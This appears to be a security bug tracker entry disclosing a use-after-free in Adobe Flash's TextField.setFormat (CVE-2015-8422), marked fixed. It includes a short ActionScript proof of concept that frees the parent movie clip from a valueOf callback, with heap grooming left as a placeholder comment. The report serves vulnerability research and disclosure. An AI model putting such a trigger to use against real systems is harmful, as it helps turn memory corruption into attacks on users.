586 - Adobe Flash: Use-after-free in TextField.setFormat - project-zero

Starred by 1 user

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Dec 2015
Cc:	project-...@google.com
CVE-2015-8422 Finder-natashenka Deadline-90 Reported-2015-Oct-14 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe

Adobe Flash: Use-after-free in TextField.setFormat

Project Member Reported by natashenka@google.com, Oct 14 2015

Back to list

The TextField setFormat method contains a use-after-free. If an integer parameter has valueOf defined, or the object parameter overrides a constructor, this method can free the TextField parent, which is subsequently used.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
var f = new TextFormat();
tf.setFormat( {valueOf : func}, 2, f);

function func(){

        if(times == 0){
             times++;
             return 0;

         }

	mc.removeMovieClip();

        // Fix heap here

	return 0;
	
	}

A sample swf and fla are attached.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

tabIndex.fla
283 KB Download

tabIndex.swf
324 KB Download

Project Member Comment 1 by natashenka@google.com, Dec 17 2015

Labels: -Restrict-View-Commit CVE-2015-8422
Status: Fixed

► Sign in to add a comment